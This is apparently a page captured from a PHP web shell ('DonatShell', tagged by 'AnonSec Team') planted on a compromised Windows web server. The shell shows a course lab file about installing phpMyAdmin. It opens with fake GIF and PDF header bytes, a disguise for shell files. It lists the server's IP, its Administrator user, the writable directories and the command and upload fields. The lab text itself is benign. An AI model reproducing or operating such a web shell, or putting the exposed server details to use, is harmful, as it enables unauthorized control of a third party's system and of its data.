GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST2608/Labs/Lab10/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST2608/Labs/Lab10/Lab10.phpinc
<?
// /JimMartinson/CST2608/Labs/Lab10/Lab10.phpinc

#require('/Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.
#require('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc');

$disabled = '';
$disabled = ' disabled';

#$showEvaluationVariables = true;
require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.
require('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc');
require('common/Browser/Browser.phpinc');

$uploadFilename = $courseNumber.'_'.$saveFilename.'.png';
	
?>
<fieldset><legend>Description</legend>
The purpose of this lab is to demonstrate your ability to install phpMyAdmin.
	<br><span class="note normal">Do not perform this lab unless <?=labLink(9,false,'')?> has been completed.</span>
<?=$gradeNote?>
<? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>

<fieldset><legend>Lab Instruction</legend>
	Create a folder for this <?=strtolower($evaluationType)?> named <b class="copyText"><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder.
<ol id="main" class="count">
	<li>Create a folder for this <?=strtolower($evaluationType)?> named <b><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder.
	<li>Ensure your server is up tp date with the command: <kbd class="copyText">sudo apt update &amp;&amp; sudo apt upgrade</kbd>.</li>
	<li>Install pgpMyAdmin with <kbd class="copyText">sudo apt install phpmyadmin</kbd>.
		<br>Select apache2 web server <img src="apache2.PNG">
		<br>Select Yes to configure phpmyadmin with dbconfig-common <img src="database.png">
		<br>Enter your MySQL server password <img src="password.png">
		<br>and confirm the password <img src="password_confirm.png">
	</li>
	<li>Open a browser to <b class="copyText">http://<?=$Uservername?>.<?=$domain?>/phpmyadmin</b>.</li>
	<li>Login as  <b class="copyText">phpmyadmin</b> with the password you just entered.</li>
	<li>Open the <b>phpmyadmin</b> database on the left.</li>
	<li><b class="info">Take a screenshot</b> and save it as <b class="copyText" style="white-space:nowrap;"><?=$uploadFilename?></b>.
		<? showBegin('See example pgpMyAdmin browser window'); BrowserBegin('pgpMyAdmin','http://jimmar16.mar.loc/phpmyadmin'); ?> <img src="phpMyAdmin.png" width="1000" alt=""><? BrowserEnd(); /** / width is image+22 height is image+60  /**/ showEnd(); ?>
	</li>
	<li>Turn in your assignment:
		<ol type="a">
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li>
		</ol>
	</li>
</ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>
<?
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team